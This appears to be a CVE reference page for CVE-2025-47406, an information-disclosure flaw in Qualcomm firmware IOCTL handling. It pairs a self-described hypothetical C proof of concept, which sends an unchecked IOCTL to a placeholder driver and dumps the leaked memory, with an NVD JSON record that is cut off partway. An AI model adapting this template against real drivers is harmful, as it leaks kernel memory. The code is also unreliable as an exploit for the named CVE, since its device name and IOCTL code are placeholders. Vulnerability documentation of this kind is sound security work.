CVE-2025-47406

#include <windows.h> #include <stdio.h> // Hypothetical Vulnerable IOCTL Code #define VULN_IOCTL 0x80002010 int main() { HANDLE hDevice = CreateFileA("\\\\.\\VulnerableDriver", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Error: %d\n", GetLastError()); return 1; } BYTE outputBuffer[0x1000]; DWORD bytesReturned = 0; printf("[*] Sending IOCTL to trigger information disclosure...\n"); // Trigger the vulnerability by sending an IOCTL with a buffer size // that the driver fails to validate correctly before copying memory. BOOL result = DeviceIoControl( hDevice, VULN_IOCTL, NULL, 0, outputBuffer, sizeof(outputBuffer), &bytesReturned, NULL ); if (result) { printf("[+] IOCTL Success! Bytes returned: %d\n", bytesReturned); printf("[+] Dumping leaked memory:\n"); for (int i = 0; i < bytesReturned; i++) { printf("%02X ", outputBuffer[i]); if ((i + 1) % 16 == 0) printf("\n"); } } else { printf("[-] IOCTL failed. Error: %d\n", GetLastError()); } CloseHandle(hDevice); return 0; }

{"cve": {"id": "CVE-2025-47406", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:20.957", "lastModified": "2026-05-06T18:02:52.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information Disclosure while processing IOCTL handler callbacks without verifying buffer size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-126"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:cologne_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FF959C0-5AAB-4DC5-AE8F-4EFA21A00B5E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:cologne:-:*:*:*:*:*:*:*", "matchCriteriaId": "E31E0C48-FB61-47C8-B28B-3A701E85E126"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6700_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "82B82E87-F3F4-466F-A76B-C8809121FF6F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6700:-:*:*:*:*:*:*:*", "matchCriteriaId": "419A132E-E42C-4395-B74B-788A39DF1D13"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6900_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E670F500-9B71-4BBE-B5DA-221D35803C89"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6900:-:*:*:*:*:*:*:*", "matchCriteriaId": "9ADEB5C5-B79A-4F45-B7D3-75945B38DB6C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_7800_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B3053D68-C5D8-4D47-A4F0-9F3AF2289E1D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_7800:-:*:*:*:*:*:*:*", "matchCriteriaId": "638DBC7F-456F-487D-BED2-2214DFF8BEE2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:iqx5121_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "499A2520-436C-4B12-849D-98B94088CCDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:iqx5121:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C34A825-C928-4F8F-B076-19F8787A3440"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:iqx7181_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F58C10B5-2BB1-4A8F-AF4B-2EC791C9FBBE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:iqx7181:-:*:*:*:*:*:*:*", "matchCriteriaId": "9EE22328-BBF8-473C-8F89-58AEF8CC9D75"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:qca0000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "CC941093-1A7C-47B2-AB3B-05AE4AE2FBE4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:qca0000:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A2AA834-C17C-4E0E-A510-795818041E47"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:qcm5430_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "4EC5F81B-AA24-4E3C-9FC8-53E010AC977E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:qcm5430:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5C66DAD-0D85-46B8-92D7-6D68B9429E9A"}]}]}, {"opera ... (truncated)